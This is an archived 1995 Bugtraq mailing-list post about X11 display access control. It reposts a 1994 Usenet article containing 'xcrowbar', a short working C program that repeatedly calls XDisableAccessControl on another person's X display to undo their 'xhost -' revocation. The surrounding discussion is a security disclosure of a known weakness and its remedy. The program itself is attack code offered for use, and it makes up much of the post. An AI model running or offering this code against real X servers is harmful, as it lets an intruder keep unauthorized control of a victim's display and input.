[614] in bugtraq

home help back first fref pref prev next nref lref last post

No subject found in mail header

daemon@ATHENA.MIT.EDU (William McVey)
Wed Jan 11 15:39:44 1995

To: der Mouse <mouse@Collatz.McRCIM.McGill.EDU>
Cc: bugtraq@fc.net
Date: Wed, 11 Jan 1995 13:27:36 -0500
From: wam@cs.purdue.edu (William McVey)

der Mouse wrote:
>What's xcrowbar, and how does it "turn[] off the authority mechanisms
>altogether"?  In my experience, only clients running on the local host,
>or the xdm host if the server was started with xdm, can fiddle with the
>access control mechanisms.

Since several people have asked me about xcrowbar in private mail.  I'm
just going to reply to the group.  xcrowbar was posted to
comp.security.unix a few months back.  Since the source code is so
short and the problem (people give access to their displays to
un trustworthy people) has a known solution (only give trustworthy
people access to your display), I'm reposting the article here. I've
attached the original article (minus a few headers) to the bottom of
this mail.  It should be obvious what it does.

As for only the local host or xdm host being able to "fiddle with the
access control mechanism", I highly doubt that the statement is true.
X servers (well, at least the distributed ones) don't pay any special
attention to whether a client is local or remote.

>In any case, yes, it's true that "xhost -" doesn't magically mean
>you're safe again.  What I do, to get the convenience of "xhost -"
>without giving up quite as much security, is I run a front-end program
>that accepts connections, ... 
<snip>

I don't suppose the program you run is freely available someplace?

 -- William

 ---- Begin article about xcrowbar ----

 Article: 8570 of comp.security.unix
 From: matt@cs.su.oz.au (Robert Matthew Barrie)
 Newsgroups: comp.security.unix
 Subject: xcrowbar.c
 Date: 1 Oct 1994 05:32:44 GMT
 Organization: Basser Department of Computer Science, University of Sydney
 Distribution: world
Message-ID: <36is9s$qrb@staff.cs.su.oz.au>

Like I said, a simple program that lets you do a XDisableAccessControl()
on a display if someone decides to "xhost -" you after you have a
pointer to their display.

matt


 --- cut here
#include <stdio.h>
#include <X11/Xlib.h>
#include <ctype.h>


main (int argc, char *argv[])
{
	Display *dpy;
    char *dis = NULL;
    int c;

    dis= argv[1]; 

    if ((dpy = XOpenDisplay(dis))==NULL){
		perror("could not open window");
		exit(0);
	}

	while ((c=getchar())!='q')
		XDisableAccessControl(dpy);

    XCloseDisplay(dpy);
}

 ---- End article about xcrowbar ----

home help back first fref pref prev next nref lref last post